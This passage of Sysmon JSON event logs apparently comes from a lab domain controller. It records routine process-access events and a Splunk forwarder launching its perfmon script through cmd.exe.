{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.098\r\nProcessGuid: {41C8662E-1F79-5F25-0000-0010D7070400}\r\nProcessId: 3240\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.098","ProcessGuid":"{41C8662E-1F79-5F25-0000-0010D7070400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nTargetProcessId: 3240\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","TargetProcessId":"3240","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010B1E90300}\r\nTargetProcessId: 3240\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010B1E90300}","TargetProcessId":"3240","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 